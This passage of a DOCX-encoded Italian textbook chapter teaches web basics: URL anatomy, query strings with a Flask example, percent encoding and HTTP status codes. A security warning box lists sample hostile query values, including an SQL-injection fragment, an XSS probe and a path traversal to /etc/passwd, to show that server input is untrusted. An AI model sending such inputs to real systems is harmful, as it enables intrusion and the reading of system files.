          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="112"/>
    <w:bookmarkEnd w:id="113"/>
    <w:bookmarkStart w:id="116" w:name="lurl-anatomia"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="471" w:name="sec_3_4"/>
      <w:r>
        <w:t xml:space="preserve">3.4 L’URL: anatomia</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Uniform Resource Locator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è l’indirizzo completo di una risorsa sul web. È meno banale di quanto sembri. Decomponiamo questa URL di esempio:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.bancapiccola.it:443/conto/fatture?anno=2025&amp;mese=3#riepilogo</w:t>
        </w:r>
      </w:hyperlink>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Valore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Significato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">https</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Il protocollo (HTTP cifrato)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">www.bancapiccola.it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Il nome del dominio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Porta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Il</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">numero di interno</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">sul server (443 è il default per HTTPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Percorso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/conto/fatture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Quale risorsa specifica vuoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Query string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?anno=2025&amp;mese=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parametri di richiesta (per le GET)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Frammento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">#riepilogo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Punto specifico della pagina (gestito dal browser, non inviato al server)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="114" w:name="X1ea7a574ce24fc09685f43cc8053b62e043b7ec"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La query string (parametri GET) in dettaglio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La parte dopo il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">query string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Contiene parametri nella forma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chiave=valore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, separati dal carattere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Nel nostro esempio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">anno=2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mese=3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando il server riceve la richiesta, può estrarre questi parametri e usarli. In Python con Flask, leggere il parametro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">anno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da una GET si scrive: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request</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">anno </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"anno"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Punto cruciale di sicurezza.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il valore di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">anno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">arriva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">dall’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, attraverso la URL. L’utente può scriverci qualunque cosa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">anno=2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">anno=lol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">anno='--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">anno=&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">anno=../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il server non può fidarsi di nulla che proviene dalla query string.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lo stesso vale per il body delle POST. Se ti ricordi una sola cosa di tutto il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, ricorda questa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="114"/>
    <w:bookmarkStart w:id="115" w:name="caratteri-speciali-nelle-url-lencoding"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Caratteri speciali nelle URL: l’encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le URL hanno un alfabeto ristretto: lettere, numeri, alcuni segni di punteggiatura. Caratteri come spazio, accentate, simboli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&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">speciali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e devono essere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">codificati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se finiscono in una URL come parte di un valore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per esempio, lo spazio diventa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(oppure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nelle query string), la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">diventa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, l’apice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">diventa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Questa trasformazione si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">URL encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">percent encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Originale:  Mario Rossi &amp; Co.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Codificato: Mario%20Rossi%20%26%20Co.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I browser fanno l’encoding automaticamente, e i framework lato server fanno il decoding altrettanto automaticamente. Lo studente alle prime armi non se ne accorge. Ma per chi studia sicurezza è importante saperlo, perché molti attacchi sfruttano proprio questo strato di codifica (per nascondere caratteri pericolosi a un filtro mal scritto, per esempio).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="115"/>
    <w:bookmarkEnd w:id="116"/>
    <w:bookmarkStart w:id="117" w:name="i-codici-di-stato-status-code"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="472" w:name="sec_3_5"/>
      <w:r>
        <w:t xml:space="preserve">3.5 I codici di stato (status code)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="472"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ogni risposta HTTP inizia con un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">codice di stato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un numero a tre cifre che riassume l’esito della richiesta. La prima cifra indica la categoria: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Categoria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Significato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Esempi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">1xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Informativo (raramente visto)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 Continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">2xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Successo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">200 OK, 201 Created, 204 No Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">3xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Redirezione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">301 Moved Permanently, 302 Found, 304 Not Modified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">4xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Errore del client (la colpa è di chi ha fatto la richiesta)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">5xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Errore del server (la colpa è del server)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">500 Internal Server Error, 502 Bad Gateway, 503 Service Unavailable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I codici da imparare bene fin da ora, perché li userai costantemente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Tutto bene, ecco la risorsa che chiedevi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">301 Moved Permanently</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">302 Found</w:t>
